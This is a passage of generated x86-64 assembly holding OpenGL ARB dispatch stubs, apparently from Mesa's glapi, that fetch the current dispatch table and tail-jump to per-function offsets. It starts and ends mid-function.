jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3648(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3648(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramEnvParameter4fvARB), .-GL_PREFIX(ProgramEnvParameter4fvARB)
/*
 * Dispatch stub for glProgramLocalParameter4dARB (generated x86-64
 * SysV code).  Two integer args plus four FP args in %xmm0-%xmm3,
 * spilled (low 64 bits each) to a 56-byte scratch frame around the
 * lookup call and restored before the tail-jump.  Table offset 3656.
 */
.p2align 4,,15
.globl GL_PREFIX(ProgramLocalParameter4dARB)
.type GL_PREFIX(ProgramLocalParameter4dARB), @function
GL_PREFIX(ProgramLocalParameter4dARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3656(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 3656(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3656(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 3656(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramLocalParameter4dARB), .-GL_PREFIX(ProgramLocalParameter4dARB)
/*
 * Dispatch stub for glProgramLocalParameter4dvARB (generated x86-64
 * SysV code).  Three integer/pointer args; three pushes restore
 * 16-byte stack alignment for the lookup call.  Table offset 3664.
 */
.p2align 4,,15
.globl GL_PREFIX(ProgramLocalParameter4dvARB)
.type GL_PREFIX(ProgramLocalParameter4dvARB), @function
GL_PREFIX(ProgramLocalParameter4dvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3664(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3664(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3664(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3664(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramLocalParameter4dvARB), .-GL_PREFIX(ProgramLocalParameter4dvARB)
/* glProgramLocalParameter4fARB dispatch stub: tail-jumps through byte
   offset 3672 of the current dispatch table.  Non-TLS paths spill the
   live argument registers (%rdi, %rsi, %xmm0-%xmm3) to a 56-byte frame
   around the lookup call (48 bytes of saves + 8 bytes padding keeps
   %rsp 16-byte aligned at the call).  Fallback uses the cached
   _glapi_Dispatch pointer, calling _glapi_get_dispatch only when the
   cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(ProgramLocalParameter4fARB)
	.type GL_PREFIX(ProgramLocalParameter4fARB), @function
GL_PREFIX(ProgramLocalParameter4fARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3672(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$56, %rsp
	movq	%rdi, (%rsp)
	movq	%rsi, 8(%rsp)
	movq	%xmm0, 16(%rsp)
	movq	%xmm1, 24(%rsp)
	movq	%xmm2, 32(%rsp)
	movq	%xmm3, 40(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	40(%rsp), %xmm3
	movq	32(%rsp), %xmm2
	movq	24(%rsp), %xmm1
	movq	16(%rsp), %xmm0
	movq	8(%rsp), %rsi
	movq	(%rsp), %rdi
	addq	$56, %rsp
	movq	3672(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3672(%rax), %r11
	jmp	*%r11
1:
	subq	$56, %rsp
	movq	%rdi, (%rsp)
	movq	%rsi, 8(%rsp)
	movq	%xmm0, 16(%rsp)
	movq	%xmm1, 24(%rsp)
	movq	%xmm2, 32(%rsp)
	movq	%xmm3, 40(%rsp)
	call	_glapi_get_dispatch
	movq	40(%rsp), %xmm3
	movq	32(%rsp), %xmm2
	movq	24(%rsp), %xmm1
	movq	16(%rsp), %xmm0
	movq	8(%rsp), %rsi
	movq	(%rsp), %rdi
	addq	$56, %rsp
	movq	3672(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ProgramLocalParameter4fARB), .-GL_PREFIX(ProgramLocalParameter4fARB)
/* glProgramLocalParameter4fvARB dispatch stub: tail-jumps through byte
   offset 3680 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi/%rdx across the lookup call (the three pushes also keep
   %rsp 16-byte aligned at the call).  Fallback uses the cached
   _glapi_Dispatch pointer, calling _glapi_get_dispatch only when the
   cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(ProgramLocalParameter4fvARB)
	.type GL_PREFIX(ProgramLocalParameter4fvARB), @function
GL_PREFIX(ProgramLocalParameter4fvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3680(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3680(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3680(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3680(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ProgramLocalParameter4fvARB), .-GL_PREFIX(ProgramLocalParameter4fvARB)
/* glProgramStringARB dispatch stub: tail-jumps through byte offset 3688
   of the current dispatch table.  Non-TLS paths preserve the integer
   argument registers %rdi/%rsi/%rdx/%rcx across the lookup call; the
   extra %rbp push is stack padding only (keeps %rsp 16-byte aligned at
   the call), not a frame pointer.  Fallback uses the cached
   _glapi_Dispatch pointer, calling _glapi_get_dispatch only when the
   cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(ProgramStringARB)
	.type GL_PREFIX(ProgramStringARB), @function
GL_PREFIX(ProgramStringARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3688(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3688(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3688(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3688(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ProgramStringARB), .-GL_PREFIX(ProgramStringARB)
/* glVertexAttrib1dARB dispatch stub: tail-jumps through byte offset
   3696 of the current dispatch table.  Non-TLS paths spill the live
   argument registers %rdi and %xmm0 to a 24-byte frame around the
   lookup call (16 bytes of saves + 8 bytes padding keeps %rsp 16-byte
   aligned at the call).  Fallback uses the cached _glapi_Dispatch
   pointer, calling _glapi_get_dispatch only when the cache is NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib1dARB)
	.type GL_PREFIX(VertexAttrib1dARB), @function
GL_PREFIX(VertexAttrib1dARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3696(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3696(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3696(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	call	_glapi_get_dispatch
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3696(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib1dARB), .-GL_PREFIX(VertexAttrib1dARB)
/* glVertexAttrib1dvARB dispatch stub: tail-jumps through byte offset
   3704 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib1dvARB)
	.type GL_PREFIX(VertexAttrib1dvARB), @function
GL_PREFIX(VertexAttrib1dvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3704(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3704(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3704(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3704(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib1dvARB), .-GL_PREFIX(VertexAttrib1dvARB)
/* glVertexAttrib1fARB dispatch stub: tail-jumps through byte offset
   3712 of the current dispatch table.  Non-TLS paths spill the live
   argument registers %rdi and %xmm0 to a 24-byte frame around the
   lookup call (16 bytes of saves + 8 bytes padding keeps %rsp 16-byte
   aligned at the call).  Fallback uses the cached _glapi_Dispatch
   pointer, calling _glapi_get_dispatch only when the cache is NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib1fARB)
	.type GL_PREFIX(VertexAttrib1fARB), @function
GL_PREFIX(VertexAttrib1fARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3712(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3712(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3712(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	call	_glapi_get_dispatch
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3712(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib1fARB), .-GL_PREFIX(VertexAttrib1fARB)
/* glVertexAttrib1fvARB dispatch stub: tail-jumps through byte offset
   3720 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib1fvARB)
	.type GL_PREFIX(VertexAttrib1fvARB), @function
GL_PREFIX(VertexAttrib1fvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3720(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3720(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3720(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3720(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib1fvARB), .-GL_PREFIX(VertexAttrib1fvARB)
/* glVertexAttrib1sARB dispatch stub: tail-jumps through byte offset
   3728 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib1sARB)
	.type GL_PREFIX(VertexAttrib1sARB), @function
GL_PREFIX(VertexAttrib1sARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3728(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3728(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3728(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3728(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib1sARB), .-GL_PREFIX(VertexAttrib1sARB)
/* glVertexAttrib1svARB dispatch stub: tail-jumps through byte offset
   3736 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib1svARB)
	.type GL_PREFIX(VertexAttrib1svARB), @function
GL_PREFIX(VertexAttrib1svARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3736(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3736(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3736(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3736(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib1svARB), .-GL_PREFIX(VertexAttrib1svARB)
/* glVertexAttrib2dARB dispatch stub: tail-jumps through byte offset
   3744 of the current dispatch table.  Non-TLS paths spill the live
   argument registers %rdi, %xmm0 and %xmm1 to a 24-byte frame around
   the lookup call (fully used; keeps %rsp 16-byte aligned at the
   call).  Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib2dARB)
	.type GL_PREFIX(VertexAttrib2dARB), @function
GL_PREFIX(VertexAttrib2dARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3744(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3744(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3744(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	call	_glapi_get_dispatch
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3744(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib2dARB), .-GL_PREFIX(VertexAttrib2dARB)
/* glVertexAttrib2dvARB dispatch stub: tail-jumps through byte offset
   3752 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib2dvARB)
	.type GL_PREFIX(VertexAttrib2dvARB), @function
GL_PREFIX(VertexAttrib2dvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3752(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3752(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3752(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3752(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib2dvARB), .-GL_PREFIX(VertexAttrib2dvARB)
/* glVertexAttrib2fARB dispatch stub: tail-jumps through byte offset
   3760 of the current dispatch table.  Non-TLS paths spill the live
   argument registers %rdi, %xmm0 and %xmm1 to a 24-byte frame around
   the lookup call (fully used; keeps %rsp 16-byte aligned at the
   call).  Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib2fARB)
	.type GL_PREFIX(VertexAttrib2fARB), @function
GL_PREFIX(VertexAttrib2fARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3760(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3760(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3760(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	call	_glapi_get_dispatch
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3760(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib2fARB), .-GL_PREFIX(VertexAttrib2fARB)
/* glVertexAttrib2fvARB dispatch stub: tail-jumps through byte offset
   3768 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib2fvARB)
	.type GL_PREFIX(VertexAttrib2fvARB), @function
GL_PREFIX(VertexAttrib2fvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3768(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3768(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3768(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3768(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib2fvARB), .-GL_PREFIX(VertexAttrib2fvARB)
/* glVertexAttrib2sARB dispatch stub: tail-jumps through byte offset
   3776 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi/%rdx across the lookup call (the three pushes also keep
   %rsp 16-byte aligned at the call).  Fallback uses the cached
   _glapi_Dispatch pointer, calling _glapi_get_dispatch only when the
   cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib2sARB)
	.type GL_PREFIX(VertexAttrib2sARB), @function
GL_PREFIX(VertexAttrib2sARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3776(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3776(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3776(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3776(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib2sARB), .-GL_PREFIX(VertexAttrib2sARB)
/* glVertexAttrib2svARB dispatch stub: tail-jumps through byte offset
   3784 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib2svARB)
	.type GL_PREFIX(VertexAttrib2svARB), @function
GL_PREFIX(VertexAttrib2svARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3784(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3784(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3784(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3784(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib2svARB), .-GL_PREFIX(VertexAttrib2svARB)
/* glVertexAttrib3dARB dispatch stub: tail-jumps through byte offset
   3792 of the current dispatch table.  Non-TLS paths spill the live
   argument registers %rdi and %xmm0-%xmm2 to a 40-byte frame around
   the lookup call (32 bytes of saves + 8 bytes padding keeps %rsp
   16-byte aligned at the call).  Fallback uses the cached
   _glapi_Dispatch pointer, calling _glapi_get_dispatch only when the
   cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib3dARB)
	.type GL_PREFIX(VertexAttrib3dARB), @function
GL_PREFIX(VertexAttrib3dARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3792(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3792(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3792(%rax), %r11
	jmp	*%r11
1:
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	call	_glapi_get_dispatch
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3792(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib3dARB), .-GL_PREFIX(VertexAttrib3dARB)
/* glVertexAttrib3dvARB dispatch stub: tail-jumps through byte offset
   3800 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib3dvARB)
	.type GL_PREFIX(VertexAttrib3dvARB), @function
GL_PREFIX(VertexAttrib3dvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3800(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3800(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3800(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3800(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib3dvARB), .-GL_PREFIX(VertexAttrib3dvARB)
/* glVertexAttrib3fARB dispatch stub: tail-jumps through byte offset
   3808 of the current dispatch table.  Non-TLS paths spill the live
   argument registers %rdi and %xmm0-%xmm2 to a 40-byte frame around
   the lookup call (32 bytes of saves + 8 bytes padding keeps %rsp
   16-byte aligned at the call).  Fallback uses the cached
   _glapi_Dispatch pointer, calling _glapi_get_dispatch only when the
   cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib3fARB)
	.type GL_PREFIX(VertexAttrib3fARB), @function
GL_PREFIX(VertexAttrib3fARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3808(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
